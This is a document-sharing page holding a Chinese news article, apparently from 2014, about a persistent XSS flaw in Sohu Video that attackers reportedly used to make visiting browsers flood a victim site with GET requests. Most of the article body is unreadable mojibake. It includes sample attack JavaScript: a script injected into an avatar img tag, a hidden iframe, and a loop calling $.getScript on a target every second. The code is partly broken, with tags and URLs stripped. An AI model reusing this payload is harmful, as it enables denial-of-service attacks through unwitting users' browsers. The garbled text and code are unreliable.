搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡.pdfVIP

  • 100
  • 0
  • 约1.86千字
  • 约 3页
  • 2015-09-26 发布于重庆
  • 举报

搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡.pdf

搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡

ËѺüÊÓÆ µXSS©¶´ÔâÀûÓà ǧÍò Óû§³ÉDDOSÈ⼦ £©4ÔÂ30ÈÕÏûÏ¢ ×òÈÕ£¬ÈÕ±¾CDN·þÎñÉÌIncapsula׫ÎÄ£¬³ÆÆäһλÓû§ ÔâÊÜÁËÒ»ÆðÌØÊâµÄÓ¦ÓòãDDos¹¥»÷£¨·Ö²¼Ê½¾Ü¾ø·þÎñ¹¥»÷£©£¬±¾´Î¹¥»÷ ÖкڿÍʹÓõÄÊÇÁ÷Á¿½Ù³Ö¼¼Êõ¡£¾Ýͳ¼Æ£¬¹²Óг¬¹ý2.2ÍòµÄÍøÃñͨ¹ýä¯ ÀÀÆ÷Ïò¸ÃÓû§µÄÍøÕ¾·¢ÆðÁËԼΪ2000Íò´ÎµÄGETÇëÇó¡£ÕâÐ©ÍøÃñ¶¼ ÊÇÔÚ·Ç×ÔÔ¸£¬ÉõÖÁ²»ÖªÇéµÄÇé¿öϳÉΪ“°ïÐ×”µÄ¡£ Incapsula¹Ù·½±íʾ²»·½±ã͸¶Ïà¹ØÍøÕ¾ÐÅÏ¢£¬ÇÒÆä¼¼ÊõÍŶÓÒÑÔÚ»ý¼«Ðè ÕÒ½â¾ö·½°¸£¬Ò»µ©ÎÊÌâµÃµ½½â¾ö£¬±ã»á¹«²¼¸ü¶àÏà¹ØÏ¸½Ú¡£¶ø¾Ý°×ñ×Ó¼ ¼ÊõÉçÇøµÄÏà¹ØÐÅÏ¢ÏÔʾ£¬±¾´Î¹¥»÷ʼþÖб»ÀûÓõÄÄǸöÍøÕ¾±ãÊÇÈ«Ç òÍøÕ¾Á÷Á¿ÅÅÃû27µÄËѺüÊÓÆµ¡£ ´ËÍ⣬IncapsulaÔÚ¹Ù²©ÖÐÒ²¶ÔºÚ¿Í¹¥»÷ËùʹÓõļ¼Êõ½øÐÐÁ˽â˵£¬´óÖ ÈçÏ£º Ôڴ˴ι¥»÷ʼþÖУ¬ºÚ¿ÍÀûÓó־ÃÐÔXSS©¶´£¬Í¨¹ý¸öÈË×ÊÁÏÖеÄÍ·ÏñÉ èÖÃÔÚ ±êÇ©ÖÐ×¢ÈëÁËJS´úÂë¡£ÕâÑùÒ»À´£¬¸ÃͼƬÿ±»Ê¹ÓÃÒ»´Î£¬Ïà¹Ø¶ñÒâ´úÂë± ã»á´«È¾Ò»´Î£¬ÈκÎÓû§·ÃÎÊÉÏÊöÒ³Ãæ£¬¶¼»á×Ô¶¯Ö´Ðб»¶ñÒâ×¢ÈëµÄJS´úÂë £¬´Ó¶ø´¥·¢ÁËÒþ²ØµÄ ʾÀý´úÂ룺 // JavaScript Injection in img tag enabled by Persistent XSS img src=/imagename.jpg / // Malicious JavaScript opens hidden iframe function ddos(url) { $(body).append(iframe id=ifr11323 style=display:none; src=/index.html/iframe); } // Ajax DDoS tool in executes GET request every second htmlbody h1Iframe/h1 script ddos(//, /2014/0430/1398849165905.jpg); function ddos(url,url2){ window.setInterval(function (){ $.getScript(url); $.getScript(url2); },1000) } /script /body/html ±»“¿ØÖÆ”µÄÓû§Ã¿Ãë¶¼»áÏòÊܺ¦È˵ÄÍøÕ¾·¢ÆðÒ»´ÎÇëÇó¡£Ã¿ÃëÒ»´Î¿´ËÆ Ã»Óжà´óÓ°Ï죬µ«Èç¹ûÒ»¶ÎÊÓÆµ30·ÖÖÓÀ´Ëµ£¬Ã¿¸öÓû§ÔÚ¿´ÊÓÆµÊ±¶¼»á ·¢³ö1800´ÎµÄÇëÇó£¬ÊÔÏëÈôÊÇÓгÉǧÉÏÍòµÄÓû§ÔÚ¹Û¿´ÊÓÆµµÄ»°£¬»áÈçºÎ ÄØ£¿ ÎÄÕÂÀ´Ô´ÓÚ£º/article-554-1.html

您可能关注的文档

文档评论(0)

1亿VIP精品文档

相关文档